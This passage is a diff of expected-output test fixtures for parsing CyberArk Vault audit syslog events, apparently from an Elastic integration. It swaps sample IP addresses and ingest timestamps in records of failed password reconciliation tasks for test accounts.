Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { - "address": "34.123.103.115" + "address": "67.43.156.15" }, "username": "testark" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -322,7 +291,7 @@ "reset_immediately": "ReconcileTask", "last_task": "ReconcileTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", @@ -336,8 +305,8 @@ "event": { "severity": 7, "reason": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", - "ingested": "2021-06-09T10:24:36.176780600Z", - "original": "\u003c7\u003e1 2021-03-14T13:46:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.123.103.115;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:46:13\",\"IsoTimestamp\":\"2021-03-14T13:46:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-34.123.103.115-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=34.123.103.115;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403079100Z", + "original": "\u003c7\u003e1 2021-03-14T13:46:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:46:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:46:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=67.43.156.15;username=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:46:13\",\"IsoTimestamp\":\"2021-03-14T13:46:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask. Failure Description: CACPM406E Reconciling Password Safe: partner, Folder: Root, Object: Operating System-UnixSSH-67.43.156.15-testark failed (try #0). Code: 8031, Error: First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\n\",\"ExtraDetails\":\"address=67.43.156.15;username=testark;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "60", "kind": "event", "action": "cpm reconcile password failed", @@ -365,19 +334,8 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "34.66.114.180", - "ip": "34.66.114.180" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { "address": "10.0.1.20", @@ -397,7 +355,7 @@ }, "@timestamp": "2021-03-14T14:49:11.000Z", "file": { - "path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart" + "path": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart" }, "ecs": { "version": "1.12.0" @@ -409,28 +367,28 @@ ], "ip": [ "10.0.1.20", - "34.66.114.180" + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Error", - "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", + "reason": "ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n", "iso_timestamp": "2021-03-14T14:49:11Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=3;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"3\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615733350\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e60\u003c/MessageID\u003e\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\n \u003cSeverity\u003eError\u003c/Severity\u003e\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\n\u003c/Reason\u003e\n \u003cExtraDetails\u003eaddress=67.43.156.15;retriescount=3;username=ELASTIC\\bart;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"WinDomain\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"3\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615733350\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LogonDomain\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "CPM Reconcile Password Failed", "issuer": "PasswordManager", "extra_details": { "other": { "retriescount": "3", - "address": "34.66.114.180" + "address": "67.43.156.15" }, "username": "ELASTIC\\bart" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.66.114.180", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "WinDomain", @@ -441,9 +399,9 @@ "last_task": "ReconcileTask", "cpm_error_details": "Parameter Reconcile account is mandatory but has an empty value or is not defined", "last_fail_date": "1615733350", - "logon_domain": "34.66.114.180" + "logon_domain": "67.43.156.15" }, - "file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart", + "file": "Root\\Operating System-WinDomain-67.43.156.14-ELASTICbart", "safe": "partner", "station": "10.0.1.20", "action": "CPM Reconcile Password Failed", @@ -457,8 +415,8 @@ "event": { "severity": 7, "reason": "Parameter Reconcile account is mandatory but has an empty value or is not defined", - "ingested": "2021-06-09T10:24:36.176781900Z", - "original": "\u003c7\u003e1 2021-03-14T14:49:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\u003c/Reason\u003e\\n \u003cExtraDetails\u003eaddress=34.66.114.180;retriescount=3;username=ELASTIC\\\\bart;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCPM Reconcile Password Failed\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WinDomain\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"ELASTIC\\\\bart\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"3\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615733350\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"34.66.114.180\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"Parameter Reconcile account is mandatory but has an empty value or is not defined\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 07:49:11\",\"IsoTimestamp\":\"2021-03-14T14:49:11Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"60\",\"Desc\":\"CPM Reconcile Password Failed\",\"Severity\":\"Error\",\"Issuer\":\"PasswordManager\",\"Action\":\"CPM Reconcile Password Failed\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-WinDomain-35.192.121.42-ELASTICbart\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"ImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #3). Code: 2101, Error: Parameter Reconcile account is mandatory but has an empty value or is not defined\\n\",\"ExtraDetails\":\"address=34.66.114.180;retriescount=3;username=ELASTIC\\\\bart;\",\"Message\":\"CPM Reconcile Password Failed\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"WinDomain\"},{\"Name\":\"UserName\",\"Value\":\"ELASTIC\\\\bart\"},{\"Name\":\"Address\",\"Value\":\"34.66.114.180\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"3\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615733350\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"LogonDomain\",\"Value\":\"34.66.114.180\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"Parameter Reconcile account is mandatory but has an empty value or is not defined\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:08.403084500Z", + "original": "\u003c7\u003e1 2021-03-14T14:49:11Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 07:49:11\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T14:49:11Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e60\u003c/MessageID\u003e\\n \u003cDesc\u003eCPM Reconcile Password Failed\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003ePasswordManager\u003c/Issuer\u003e\\n \u003cAction\u003eCPM Reconcile Password Failed\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WinDomain-67.43.156.14-ELASTICbart\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003eImmediateTask,Failure. Failure Description: CACPM406E Reconciling Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.14-ELASTICbart failed (try #3). Code: 2101, Error: Parameter 